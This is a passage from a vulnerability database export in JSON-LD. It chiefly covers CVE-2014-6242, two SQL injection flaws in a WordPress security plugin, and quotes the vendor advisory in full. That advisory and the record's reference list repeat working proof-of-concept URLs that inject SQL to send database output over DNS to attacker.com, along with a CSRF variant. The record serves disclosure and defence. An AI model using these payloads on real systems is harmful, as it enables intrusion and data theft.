            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0894"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0894"
          },
          {
            "trust": 0.3,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/"
          },
          {
            "trust": 0.3,
            "url": "http://jvndb.jvn.jp/en/contents/2015/jvndb-2015-000037.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.wordpress.org/"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "date": "2015-05-06T00:00:00",
            "db": "BID",
            "id": "74856"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "date": "2015-03-07T02:59:01.537000",
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "date": "2015-05-06T00:00:00",
            "db": "BID",
            "id": "74856"
          },
          {
            "date": "2015-03-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All In One WP Security \u0026 Firewall vulnerable to SQL injection",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201410-1086

    Vulnerability from variot - Updated: 2025-04-13 23:21

    Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party may be able to execute SQL commands. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. All In One WP Security & Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a blogging platform developed by WordPress Software Foundation using the PHP language, which supports setting up personal blogging websites on PHP and MySQL servers. Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Version(s): 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 [without technical details] Vendor Notification: September 3, 2014 Vendor Patch: September 12, 2014 Public Disclosure: September 24, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-6242 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


    Advisory Details:

    High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in the All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges; however, they can also be exploited by a non-authenticated attacker via a CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    The PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request for the IP address of the version() (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

    http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

    This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. To do so, an attacker would have to trick a logged-in administrator into visiting a web page containing a CSRF exploit, e.g.:

    http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

    1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    The PoC code below is based on the DNS Exfiltration technique and may be used to demonstrate the vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request for the IP address of the version() (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

    http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29

    This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. [2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.


    Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1086",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wordpress security and firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "tips and tricks hq",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.8.3"
          },
          {
            "model": "all in one wordpress security and firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "tips and tricks hq",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.3"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "High-Tech Bridge Security Research Lab",
        "sources": [
          {
            "db": "BID",
            "id": "70150"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2014-6242",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2014-6242",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "VHN-74185",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-6242",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-6242",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201410-046",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-74185",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple SQL injection vulnerabilities in the All In One WP Security \u0026 Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php.  NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party can SQL The command may be executed. \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nAll In One WP Security \u0026amp; Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers. Advisory ID: HTB23231\nProduct: All In One WP Security WordPress plugin\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior\nTested Version: 3.8.2\nAdvisory Publication:  September 3, 2014  [without technical details]\nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 \nVulnerability Type: SQL Injection [CWE-89]\nCVE Reference: CVE-2014-6242\nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. 
Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\n\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. 
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\n\nhttp://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\n\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. \n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. 
\n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-74185",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "IMMUNIWEB",
            "id": "HTB23231",
            "trust": 2.9
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "70150",
            "trust": 2.0
          },
          {
            "db": "PACKETSTORM",
            "id": "128419",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "34781",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046",
            "trust": 0.7
          },
          {
            "db": "XF",
            "id": "96204",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-74185",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "id": "VAR-201410-1086",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:21:24.616000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WordPress Security and Firewall Plugin",
            "trust": 0.8,
            "url": "http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin"
          },
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://www.htbridge.com/advisory/htb23231"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/70150"
          },
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog"
          },
          {
            "trust": 1.7,
            "url": "http://www.exploit-db.com/exploits/34781"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/128419/all-in-one-wp-security-3.8.2-sql-injection.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/533519/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/96204"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6242"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6242"
          },
          {
            "trust": 0.6,
            "url": "http://xforce.iss.net/xforce/xfdb/96204"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/533519/100/0/threaded"
          },
          {
            "trust": 0.4,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          },
          {
            "trust": 0.1,
            "url": "http://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026order=,%28select%20load_file%28concat%28char%2892%29,char%2892%29,%28select%20version%28%29%29,char%2846%29,char%2897%29,char%28116%29,char%28116%29,char%2897%29,char%2899%29,char%28107%29,char%28101%29,char%28114%29,char%2846%29,char%2899%29,char%28111%29,char%28109%29,char%2892%29,char%28102%29,char%28111%29,char%28111%29,char%2898%29,char%2897%29,char%28114%29%29%29%29"
          },
          {
            "trust": 0.1,
            "url": "https://www.htbridge.com/advisory/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6242"
          },
          {
            "trust": 0.1,
            "url": "http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin"
          },
          {
            "trust": 0.1,
            "url": "https://www.htbridge.com/immuniweb/"
          },
          {
            "trust": 0.1,
            "url": "http://cwe.mitre.org"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/"
          },
          {
            "trust": 0.1,
            "url": "http://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28concat%28char%2892%29,char%2892%29,%28select%20version%28%29%29,char%2846%29,char%2897%29,char%28116%29,char%28116%29,char%2897%29,char%2899%29,char%28107%29,char%28101%29,char%28114%29,char%2846%29,char%2899%29,char%28111%29,char%28109%29,char%2892%29,char%28102%29,char%28111%29,char%28111%29,char%2898%29,char%2897%29,char%28114%29%29%29%29"
          },
          {
            "trust": 0.1,
            "url": "http://[host]/wp-admin/admin.php?page=aiowpsec\u0026tab=tab1\u0026orderby=%28select%20load_file%28concat%28char%2892%29,char%2892%29,%28select%20version%28%29%29,char%2846%29,char%2897%29,char%28116%29,char%28116%29,char%2897%29,char%2899%29,char%28107%29,char%28101%29,char%28114%29,char%2846%29,char%2899%29,char%28111%29,char%28109%29,char%2892%29,char%28102%29,char%28111%29,char%28111%29,char%2898%29,char%2897%29,char%28114%29%29%29%29\"\u003e"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "db": "BID",
            "id": "70150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
